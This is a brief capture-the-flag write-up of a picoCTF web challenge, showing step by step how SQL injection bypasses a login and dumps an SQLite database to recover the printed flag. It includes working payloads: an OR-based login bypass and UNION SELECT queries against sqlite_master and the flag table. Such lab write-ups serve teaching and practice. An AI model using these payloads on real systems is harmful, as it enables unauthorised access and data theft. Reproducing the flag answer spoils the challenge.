Write-up author: jon-brandy
Can you find the flag on this website. Try to find the flag here.
- SQLiLite
- In this challenge we're given a web app which has a login feature.
- Let's fill both username and password as
' OR "1=1"-- -.
RESULT
- Successfully logged in, now we need to dump the data, based from the hint the DBMS might be sqlite3, let's try to find the number of columns (should be 3, because it shows us 3, but let's check it again) that could be viewed, use this query:
' UNION SELECT 1,2,3-- -
RESULT
- Great now let's dump all the table name from sqlite_master, query:
' UNION SELECT 1, tbl_name, 3 FROM sqlite_master;--RESULT
- Great now we know that there's 4 table name within sqlite_master, but things to note here. In sqlite3, there's a column name named sql in sqlite_master. This column stores all the SQL syntax used to create database object.
- Let's run this query:
' UNION SELECT 1, sql, 3 FROM sqlite_master;--RESULT
- Notice inside the more_table table, it stored a column named flag, this should be our interest now. Let's run this query:
' UNION SELECT 1, flag, 3 FROM more_table;--RESULT
- Got the flag!
picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_98236ce6}